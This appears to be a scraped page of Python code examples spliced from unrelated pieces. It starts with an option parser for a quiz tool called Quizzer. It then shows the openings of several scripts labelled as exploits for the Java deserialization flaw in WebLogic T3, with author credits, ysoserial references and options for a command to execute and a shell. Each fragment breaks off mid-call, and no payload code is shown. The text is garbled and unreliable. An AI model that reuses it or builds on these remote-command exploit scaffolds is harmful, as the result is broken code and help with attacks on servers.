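def parse(argv):
    """Parse Quizzer's command-line options.

    Args:
        argv: Argument list to parse, without the program name. ``None``
            makes optparse fall back to ``sys.argv[1:]``.

    Returns:
        The ``(options, args)`` pair produced by ``OptionParser.parse_args``.
        ``options.filename`` holds the value given to ``-f``/``--file`` or
        ``-m``/``--manifest`` (the later one on the command line wins, both
        write the same destination), ``options.verbose`` is ``False`` after
        ``-q``/``--quiet`` and ``True`` otherwise, and ``args`` lists the
        remaining positional arguments.
    """
    # optparse has no ``banner`` attribute; the usage text belongs in the
    # constructor, which strips the leading "Usage: " itself.
    opts = OptionParser(usage="Usage: Quizzer [ options ]")

    # -h/--help is registered by OptionParser automatically. Registering it
    # again (with the help text passed as a third option string) raised
    # before any argument was parsed, so it is not repeated here.
    opts.add_option(
        "-f", "--file",
        dest="filename",
        metavar="FILE",
        help="-f Quizz.json,Assessment.json",
    )
    # This option previously reused the long name "--file", which optparse
    # rejects with OptionConflictError; it now has its own long name.
    opts.add_option(
        "-m", "--manifest",
        dest="filename",
        metavar="FILE",
        help="-m Manifest.json",
    )
    opts.add_option(
        "-q", "--quiet",
        action="store_false",
        dest="verbose",
        default=True,
        help="don't print status messages to stdout",
    )

    # Parse the list the caller handed in (it used to be ignored) and give
    # the result back instead of discarding it.
    return opts.parse_args(argv)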
import socket
import sys
import binascii
import time
import ssl
from optparse import OptionParser

# Command-line interface. The usage string names two positional arguments
# (hostname, port); everything else is an option.
parser = OptionParser(
    version="%prog 1.0",
    usage="usage: %prog hostname port [options]",
)
# NOTE(review): optparse never reads a ``banner`` attribute, so this text is
# only shown if other code prints it - confirm against the rest of the script.
parser.banner = "Nervous WebLogic Unserialize Vulnerability Exploit\n"

# -c/--cmd: free-form string kept in options.payload; empty when omitted.
parser.add_option(
    "-c", "--cmd",
    dest="payload",
    action="store",
    default="",
    help="Command to execute",
)

# -o/--os: optparse rejects any value other than the two listed choices.
parser.add_option(
    "-o", "--os",
    dest="os",
    action="store",
    type="choice",
    choices=["unix", "win"],
    default="unix",
    help="Target operating system (unix/win). Default is unix",
)
parser.add_option("-l",
                  "--shell",
                  type="choice",
                  choices=['sh', 'bash'],
Beispiel #3
# Loubia is a script to exploit the Java deserialization ("unserialize") vulnerability on T3-enabled backends (WebLogic Server)
# By Nassim Abbaoui ([email protected] / [email protected])
# Based on work presented here http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
# The original payload (malicious java serialized object) was generated using a modified version of ysoserial (https://github.com/frohoff/ysoserial) that allows using pipes/redirections in the command to execute

import socket
import sys
import binascii
import time
import ssl
from optparse import OptionParser

# Option parser for the script; per the usage string the two positional
# arguments are the hostname and the port.
parser = OptionParser(version="%prog 1.0",
                      usage="usage: %prog hostname port [options]")

# NOTE(review): ``banner`` is a plain attribute set on the parser object;
# optparse does not print it by itself - presumably used elsewhere, confirm.
parser.banner = "Loubia = t3 java unserialize exploitation script\n By Nassim Abbaoui ([email protected] / [email protected])\n"

# -c/--cmd is stored verbatim in options.payload and defaults to "".
parser.add_option("-c", "--cmd", dest="payload", default="",
                  action="store", help="Command to execute")
parser.add_option(
    "-o",
    "--os",
    type='choice',
    choices=['unix', 'win'],
    action="store",
    dest="os",
    default="unix",
    help="Target operating system (unix/win). Default is unix",
Beispiel #4
#!/usr/bin/python
# Loubia is a script to exploit the Java deserialization ("unserialize") vulnerability on T3-enabled backends (WebLogic Server)
# By Nassim Abbaoui ([email protected] / [email protected])
# Based on work presented here http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
# The original payload (malicious java serialized object) was generated using a modified version of ysoserial (https://github.com/frohoff/ysoserial) that allows using pipes/redirections in the command to execute

import socket
import sys
import binascii
import time
import ssl
from optparse import OptionParser

# Build the command-line parser. Usage string: two positionals (hostname and
# port) followed by options.
parser = OptionParser(
    usage="usage: %prog hostname port [options]",
    version="%prog 1.0",
)

# NOTE(review): optparse ignores a ``banner`` attribute; this string is only
# visible if code outside this block prints it - confirm.
parser.banner = "Loubia = t3 java unserialize exploitation script\n By Nassim Abbaoui ([email protected] / [email protected])\n"

# -c/--cmd -> options.payload (string, "" when the flag is absent).
parser.add_option(
    "-c",
    "--cmd",
    help="Command to execute",
    default="",
    dest="payload",
    action="store",
)

# -o/--os -> options.os; only "unix" or "win" pass optparse's choice check,
# and "unix" is used when the flag is absent.
parser.add_option(
    "-o",
    "--os",
    help="Target operating system (unix/win). Default is unix",
    default="unix",
    dest="os",
    action="store",
    choices=["unix", "win"],
    type="choice",
)
parser.add_option("-l", "--shell",
              type="choice",
              choices=['sh', 'bash'],